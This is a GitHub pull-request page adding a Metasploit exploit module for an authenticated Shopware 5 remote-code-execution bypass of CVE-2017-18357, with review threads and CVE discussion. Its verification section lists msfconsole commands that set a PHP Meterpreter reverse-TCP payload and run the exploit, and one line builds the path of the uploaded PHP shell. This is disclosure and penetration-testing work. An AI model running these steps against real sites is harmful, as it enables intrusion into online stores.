-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Added CVE-2017 18357 - Shopware createInstanceFromNamedArguments PHP Object Instantiation #11828
Conversation
modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
Show resolved
Hide resolved
modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
Outdated
Show resolved
Hide resolved
Hi, just a heads up. I'm having issues with my laptop after the Mojave upgrade, it may take a few days for me to be able to start testing this PR again. Thanks for waiting @stevenseeley ! |
duuuuuude, of course, take your time! |
I ran into a little trouble due to a bug but the exploit has been confirmed:
I can fix that bug and then land it. Thank you for the patience @stevenseeley. Always happy to see your work! |
Ok now this output is better:
Nothing major, it's just I had to make sure the php payload path is normalized: php = Rex::FileUtils.normalize_unix_path("#{webroot}#{target_uri.path}media/#{@shll_bd}.php") Landing now! |
Release NotesShopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 3, Doctrine 2 & Zend Framework Shopware comes as the perfect platform for your next e-commerce project. Furthermore Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform.. In the createInstanceFromNamedArguments method, a PHP object instantiation vulnerability was discovered by @KarimOuerghemmi of RIPS who rated the bug as a CVSS 3.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) due to leveraging an XXE primitive. Later on, I bypassed the whitelist patch and found an RCE primitive via PHP object injection. Note that authentication is required to exploit this vulnerability. |
So, I had a conversation with some MITRE & CERT folks about this bug, and the consensus landed on that this does seem to describe a new vulnerability after all. Looking at rule CNT1, it's an independently fixable issue, so it looks like the old vuln and this new vuln are, from CVE's perspective, two different vulnerabilities (even though they end up hitting the same codepath). Practically speaking, someone looking at Shopware CVEs from a vuln management perspective may not know that the old patch is insufficient unless and until there's a new CVE that specifically points that out. I'll take on wrangling that new CVE for @stevenseeley . |
In PR rapid7#11828, the module author requested, and got, a new CVE for this issue. The module should reflect that.
Background
Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 3, Doctrine 2 & Zend Framework Shopware comes as the perfect platform for your next e-commerce project. Furthermore Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform..
In the createInstanceFromNamedArguments method, a PHP object instantiation vulnerability was discovered by @KarimOuerghemmi of RIPS who rated the bug as a CVSS 3.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) due to leveraging an XXE primitive. Later on, I bypassed the whitelist patch and found an RCE primitive via PHP object injection. Note that authentication is required to exploit this vulnerability.
This vulnerability is a bypass for CVE-2017-18357 and was tested on Shopware git branches 5.6 (currently the latest), 5.5, 5.4, 5.3.
References
Notes
Setup
The following is the exact setup I used to test and analyze the vulnerability:
For installation instructions, please refer to the Shopware installation guide.
Verification
msfconsole
use exploit/multi/http/shopware_createinstancefromnamedarguments_rce
set payload php/meterpreter/reverse_tcp
set LHOST x.x.x.x
set RHOSTS y.y.y.y
check
exploit
Example